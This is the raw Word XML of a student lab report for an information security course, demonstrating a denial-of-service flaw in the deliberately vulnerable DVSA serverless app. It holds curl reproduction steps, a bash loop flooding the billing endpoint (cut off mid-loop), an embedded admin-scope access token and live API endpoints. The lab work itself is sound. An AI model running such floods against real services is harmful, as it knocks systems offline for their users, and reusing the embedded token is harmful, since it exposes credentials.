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44459" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FFA5ED1" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C80787" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67581ECC" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05CEC829" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="467776F4" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRPr="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="730F3EA2" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E13FC43" w14:textId="73147667" w:rsidR="005C76E2" w:rsidRDefault="00F24FB8" w:rsidP="00CF3286">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F24FB8">
        <w:t>ICS-344</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24FB8">
        <w:t>Information Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433D0CB2" w14:textId="2FEFD8D9" w:rsidR="00F24FB8" w:rsidRDefault="00F24FB8" w:rsidP="00CF3286">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Section 02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BBBC43" w14:textId="56814583" w:rsidR="0078696F" w:rsidRDefault="0078696F" w:rsidP="005A2E5A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="0095380A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
          </w:rPr>
          <w:t>http://dvsa-website-test-546079881937-us-east-1.s3-website.us-east-1.amazonaws.com/orders</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A3BA613" w14:textId="4D759401" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="005A2E5A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF3286">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>AWS Region</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="005A2E5A" w:rsidRPr="005A2E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A2E5A" w:rsidRPr="005A2E5A">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>us-east-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E1A2F6" w14:textId="1D497218" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Date:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3286">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3286">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>19 April 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FA9F9A" w14:textId="6D4CE2F7" w:rsidR="00BA72A1" w:rsidRDefault="007322BC" w:rsidP="0036076B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007322BC">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Denial of Service (DoS)</w:t>
      </w:r>
      <w:r w:rsidR="00BA72A1">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F68C1B" w14:textId="7ED3285E" w:rsidR="00F24FB8" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:lastRenderedPageBreak/>
        <w:t>Goal and Vulnerability Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232CD5CE" w14:textId="63AA2920" w:rsidR="00BA72A1" w:rsidRDefault="00843D58" w:rsidP="009538B4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>This lesson demonstrates a Denial of Service (DoS) vulnerability in the DVSA application. The goal is to show that the billing functionality can be overwhelmed by sending multiple concurrent requests, leading to backend instability and service degradation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>The vulnerability affects the API Gateway</w:t>
      </w:r>
      <w:r w:rsidR="009538B4">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>Lambda (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>order_billing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="009538B4">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:t>DynamoDB workflow, where excessive requests cause the system to fail in handling legitimate operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18516498" w14:textId="3122E45C" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Why This Works / Root Caus</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43688675" w14:textId="047313C0" w:rsidR="006036CD" w:rsidRDefault="006036CD" w:rsidP="006036CD">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>The vulnerability exists because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFB112B" w14:textId="77777777" w:rsidR="006036CD" w:rsidRDefault="006036CD" w:rsidP="006036CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>No rate limiting is applied at API Gateway or Lambda level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CE7039" w14:textId="77777777" w:rsidR="006036CD" w:rsidRDefault="006036CD" w:rsidP="006036CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>No request throttling or concurrency control exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A8BF8D" w14:textId="671DFCAB" w:rsidR="006036CD" w:rsidRDefault="006036CD" w:rsidP="006036CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>The backend logic executes for every incoming request without validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FF9672" w14:textId="2ECC1A69" w:rsidR="006036CD" w:rsidRDefault="006036CD" w:rsidP="006036CD">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>As a result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3B628A" w14:textId="77777777" w:rsidR="006036CD" w:rsidRDefault="006036CD" w:rsidP="006036CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Multiple concurrent requests overload Lambda execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D401AC8" w14:textId="77777777" w:rsidR="006036CD" w:rsidRDefault="006036CD" w:rsidP="006036CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Backend code crashes due to unhandled conditions (e.g., missing fields like total)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D582227" w14:textId="0498603D" w:rsidR="00BA72A1" w:rsidRDefault="006036CD" w:rsidP="007D196F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>The system cannot maintain availability under load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63819883" w14:textId="7E53F04B" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Environment and Setu</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EDC212" w14:textId="77777777" w:rsidR="006B06FE" w:rsidRDefault="006B06FE" w:rsidP="006B06FE">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>AWS Region: us-east-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313B24E0" w14:textId="77777777" w:rsidR="006B06FE" w:rsidRDefault="006B06FE" w:rsidP="006B06FE">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Services used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4502746D" w14:textId="77777777" w:rsidR="006B06FE" w:rsidRDefault="006B06FE" w:rsidP="006B06FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>API Gateway (entry point)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A394547" w14:textId="77777777" w:rsidR="006B06FE" w:rsidRDefault="006B06FE" w:rsidP="006B06FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Lambda (order_billing.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522379CD" w14:textId="77777777" w:rsidR="006B06FE" w:rsidRDefault="006B06FE" w:rsidP="006B06FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>DynamoDB (order storage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3604927A" w14:textId="77777777" w:rsidR="006B06FE" w:rsidRDefault="006B06FE" w:rsidP="006B06FE">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68742676" w14:textId="77777777" w:rsidR="006B06FE" w:rsidRDefault="006B06FE" w:rsidP="006B06FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Kali Linux terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF47C65" w14:textId="77777777" w:rsidR="006B06FE" w:rsidRDefault="006B06FE" w:rsidP="006B06FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>curl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51160CAF" w14:textId="6046B88C" w:rsidR="00BA72A1" w:rsidRDefault="006B06FE" w:rsidP="00AE58D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E925E98" w14:textId="77777777" w:rsidR="0035209E" w:rsidRDefault="0035209E" w:rsidP="0035209E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E2C502F" w14:textId="3B71F3F6" w:rsidR="0035209E" w:rsidRDefault="0035209E" w:rsidP="0035209E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0035209E">
        <w:t>export API=</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="0095380A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://h3x14rchv6.execute-api.us-east-1.amazonaws.com/dvsa/order</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30B3726F" w14:textId="7F873BAD" w:rsidR="0035209E" w:rsidRDefault="0035209E" w:rsidP="0035209E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0035209E">
        <w:t>export TOKEN="eyJraWQiOiJPQkJnV0llaFByYmVLV0orenZ2XC9PRURzeGpyNmJZSERsck1LNzVwU0lOWT0iLCJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJmNDA4YzRlOC01MGIxLTcwNWQtOGI5Yy1hZDg1Mjg5ODgzZTIiLCJpc3MiOiJodHRwczpcL1wvY29nbml0by1pZHAudXMtZWFzdC0xLmFtYXpvbmF3cy5jb21cL3VzLWVhc3QtMV9ETDlVclh6RDciLCJjbGllbnRfaWQiOiI2bjFmaXNqZXZoMzBsNjE1YW5zZXRibDFjcyIsIm9yaWdpbl9qdGkiOiI3YTI2Y2I1YS0xMzI0LTRjNjctYjAyOC1iMTVlZWFiNjk5ZGYiLCJldmVudF9pZCI6IjExODlhZTQ2LWI4NDYtNGU2Mi</w:t>
      </w:r>
      <w:r w:rsidRPr="0035209E">
        <w:lastRenderedPageBreak/>
        <w:t>04NzE2LTU5NWMwYjhhOWU1OCIsInRva2VuX3VzZSI6ImFjY2VzcyIsInNjb3BlIjoiYXdzLmNvZ25pdG8uc2lnbmluLnVzZXIuYWRtaW4iLCJhdXRoX3RpbWUiOjE3NzYxMDE1MTIsImV4cCI6MTc3NjEwNTExMiwiaWF0IjoxNzc2MTAxNTEyLCJqdGkiOiIxYjgxNTVhYi1hODg5LTQyMGYtYTY4ZC0yYTVkMzllMTc0ZWMiLCJ1c2VybmFtZSI6ImY0MDhjNGU4LTUwYjEtNzA1ZC04YjljLWFkODUyODk4ODNlMiJ9.g5mo31lhT1ggkh1-gr-PGipS_q3iWitDyJ75j8C4GnH-HSbjQwlLu27NXk_KgU6sQwPXsYwj_YzrTVkxF5p0g_WWsAfApDKgmqHSGD8IkIBXqVL_f713gi8IpwXWDHPhR9QFmG5EIJuZvV6kXjF7dYLljiihju7koIrSYeO7uLosnYm5YWQBEbliiOI7OI_rYC0IO6INR_rb5zKctZ1xFd6SVaX-tGRQ97gh7KEv3CRGcu_Inibfh_mn0OKtJObSOcdzYLle2WOwPOxi3_1elNvi3g2cBWusnctdthWo8YruABCoyp3Vuj4MrydmbecXv7H-AL9Na9K2mztsJqnMzA"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AF30D4" w14:textId="77777777" w:rsidR="007533DF" w:rsidRDefault="007533DF" w:rsidP="0035209E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C00F386" w14:textId="08D3D205" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Reproduction Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35568032" w14:textId="6DF0AB95" w:rsidR="007533DF" w:rsidRDefault="007533DF" w:rsidP="007533DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007533DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1 — Create Order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B3A623" w14:textId="77777777" w:rsidR="007533DF" w:rsidRDefault="007533DF" w:rsidP="007533DF">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>curl -s "$API" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F96150" w14:textId="77777777" w:rsidR="007533DF" w:rsidRDefault="007533DF" w:rsidP="007533DF">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-H "content-type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5516F04F" w14:textId="77777777" w:rsidR="007533DF" w:rsidRDefault="007533DF" w:rsidP="007533DF">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-H "authorization: $TOKEN" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EB655A" w14:textId="7665AC9C" w:rsidR="00BA72A1" w:rsidRDefault="007533DF" w:rsidP="00D4477C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">--data-raw '{"action":"new","cart-id":"cart-123","items":{"1":1}}' | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="356A26A9" w14:textId="77777777" w:rsidR="00D4477C" w:rsidRDefault="00D4477C" w:rsidP="00D4477C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CFE94B9" w14:textId="7321807F" w:rsidR="00BA72A1" w:rsidRDefault="00D4477C" w:rsidP="00D4477C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4477C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2 — Add Shipping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161A648E" w14:textId="77777777" w:rsidR="00D4477C" w:rsidRPr="00D4477C" w:rsidRDefault="00D4477C" w:rsidP="00D4477C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4477C">
        <w:t>curl -s "$API" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D90568F" w14:textId="77777777" w:rsidR="00D4477C" w:rsidRPr="00D4477C" w:rsidRDefault="00D4477C" w:rsidP="00D4477C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4477C">
        <w:t>-H "content-type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4477C">
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4477C">
        <w:t>" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75555D8C" w14:textId="77777777" w:rsidR="00D4477C" w:rsidRPr="00D4477C" w:rsidRDefault="00D4477C" w:rsidP="00D4477C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4477C">
        <w:t>-H "authorization: $TOKEN" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496CF0F6" w14:textId="66F2CD80" w:rsidR="00D4477C" w:rsidRPr="00D4477C" w:rsidRDefault="00D4477C" w:rsidP="00D4477C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4477C">
        <w:t xml:space="preserve">--data-raw "{\"action\":\"shipping\",\"order-id\":\"$ORDER_ID\",\"data\":{\"address\":\"test\",\"email\":\"test@test.com\",\"name\":\"test\"}}" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4477C">
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E09E3F9" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="1C3FDE99" w14:textId="2E9313AD" w:rsidR="004B3BCB" w:rsidRDefault="004B3BCB" w:rsidP="004B3BCB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B3BCB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3 — Single Billing Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1AD4A4" w14:textId="77777777" w:rsidR="004B3BCB" w:rsidRDefault="004B3BCB" w:rsidP="004B3BCB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>curl -s "$API" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365C3EC4" w14:textId="77777777" w:rsidR="004B3BCB" w:rsidRDefault="004B3BCB" w:rsidP="004B3BCB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-H "content-type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE0BEF9" w14:textId="77777777" w:rsidR="004B3BCB" w:rsidRDefault="004B3BCB" w:rsidP="004B3BCB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-H "authorization: $TOKEN" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D031609" w14:textId="480AFACC" w:rsidR="004B3BCB" w:rsidRDefault="004B3BCB" w:rsidP="004B3BCB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">--data-raw "{\"action\":\"billing\",\"order-id\":\"$ORDER_ID\",\"data\":{\"ccn\":\"4545454545454545\",\"exp\":\"04/41\",\"cvv\":\"471\"}}" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="356535B4" w14:textId="77777777" w:rsidR="00C34DD1" w:rsidRDefault="00C34DD1" w:rsidP="004B3BCB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FA5420F" w14:textId="77777777" w:rsidR="00C34DD1" w:rsidRDefault="00C34DD1" w:rsidP="004B3BCB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3243F7E8" w14:textId="77777777" w:rsidR="00C34DD1" w:rsidRDefault="00C34DD1" w:rsidP="004B3BCB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77AFACC7" w14:textId="01A6F702" w:rsidR="00C34DD1" w:rsidRDefault="00C34DD1" w:rsidP="00C34DD1">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C34DD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 4 — DoS Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236323B0" w14:textId="77777777" w:rsidR="00C34DD1" w:rsidRPr="00C34DD1" w:rsidRDefault="00C34DD1" w:rsidP="00C34DD1">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C34DD1">
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C34DD1">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C34DD1">
        <w:t xml:space="preserve"> in {1..50}; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5CEF6E" w14:textId="77777777" w:rsidR="00C34DD1" w:rsidRPr="00C34DD1" w:rsidRDefault="00C34DD1" w:rsidP="00C34DD1">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C34DD1">
        <w:t xml:space="preserve">  curl -s "$API" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615A164A" w14:textId="77777777" w:rsidR="00C34DD1" w:rsidRPr="00C34DD1" w:rsidRDefault="00C34DD1" w:rsidP="00C34DD1">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C34DD1">
        <w:t xml:space="preserve">  -H "content-type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C34DD1">
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C34DD1">
        <w:t>" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58161216" w14:textId="77777777" w:rsidR="00C34DD1" w:rsidRPr="00C34DD1" w:rsidRDefault="00C34DD1" w:rsidP="00C34DD1">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C34DD1">
        <w:t xml:space="preserve">  -H "authorization: $TOKEN" \</w:t>
      </w:r>
    </w:p>
